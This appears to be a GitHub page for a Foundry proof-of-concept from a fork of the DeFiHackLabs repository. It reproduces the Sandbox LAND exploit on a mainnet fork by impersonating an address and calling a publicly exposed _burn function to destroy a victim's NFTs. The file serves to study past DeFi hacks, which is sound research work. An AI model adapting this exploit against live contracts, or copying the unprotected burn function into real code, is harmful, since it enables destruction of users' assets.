forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Sandbox_exp.sol
26 lines (22 loc) · 1.15 KB
/
Sandbox_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
ILand Land = ILand(0x50f5474724e0Ee42D9a4e711ccFB275809Fd6d4a);
address victim = 0x9cfA73B8d300Ec5Bf204e4de4A58e5ee6B7dC93C;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 14_163_041); //fork mainnet at block 14163041
}
function testExploit() public {
cheats.startPrank(0x6FB0B915D0e10c3B2ae42a5DD879c3D995377A2C);
console.log("Before exploiting, victim owned NFT:", Land._numNFTPerAddress(victim)); // 2762 is the number of NFTs in the victim's account.
for (uint256 i = 0; i < 100; i++) {
// let's try to burn 100 nfts
Land._burn(victim, victim, 3738); // _burn function that was set to be called was set in a public state, anyone can burn any user's NFT.
}
console.log("After exploiting, victim owned NFT:", Land._numNFTPerAddress(victim));
}
}